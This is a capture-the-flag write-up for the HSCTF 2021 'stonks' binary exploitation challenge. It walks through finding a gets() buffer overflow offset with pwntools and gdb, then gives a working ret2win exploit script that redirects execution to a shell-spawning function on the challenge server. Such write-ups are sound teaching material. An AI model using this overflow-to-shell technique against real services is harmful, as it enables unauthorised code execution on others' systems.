Hsctf 2021

stonks

Solved By : Taz and thewhiteh4t

• after disassembling :

• vuln function disassembled :

• gets is used, lets calculate the offset at which it crashes :

from pwn import *

p = process("./chal")
p.sendline(cyclic(200, n=8)) # n -> architecture | 8 -> 64bit
p.wait()

core = p.corefile
offset = cyclic_find(core.read(core.rsp, 8), n=8)
print(offset)

OUTPUT :

• offset is 40

• finding all functions :

info functions

• when we checked ai_debug we found that it has a system call!

• then we checked what its doing :

b main
run
jump ai_debug

OUTPUT :

• it is executing /usr/bin/dash so we can get a shell if we can call ai_debug function

• Address of ai_debug :

Exploit :

#!/usr/bin/python3

from pwn import *

host = 'stonks.hsc.tf'
port = 1337
offset = 40
addr = 0x401258
ret = 0x4012f3

junk = b'A' * offset
le_num = p64(addr)
le_ret = p64(ret)
buffer = junk + le_ret + le_num

conn = remote(host, port)
conn.recvuntil('symbol:')
conn.sendline(buffer)
conn.interactive()

• Return address has been added because there is a stack alignment issue caused by LIBC present in Ubuntu i.e. the container running on the target

• Exploit was working locally but not remotely so we found this reddit thread

• https://www.reddit.com/r/securityCTF/comments/nbb5z2/buffer_overflow_works_fine_locally_but_not/

• Thanks to Andr3 and hiatus!

OUTPUT :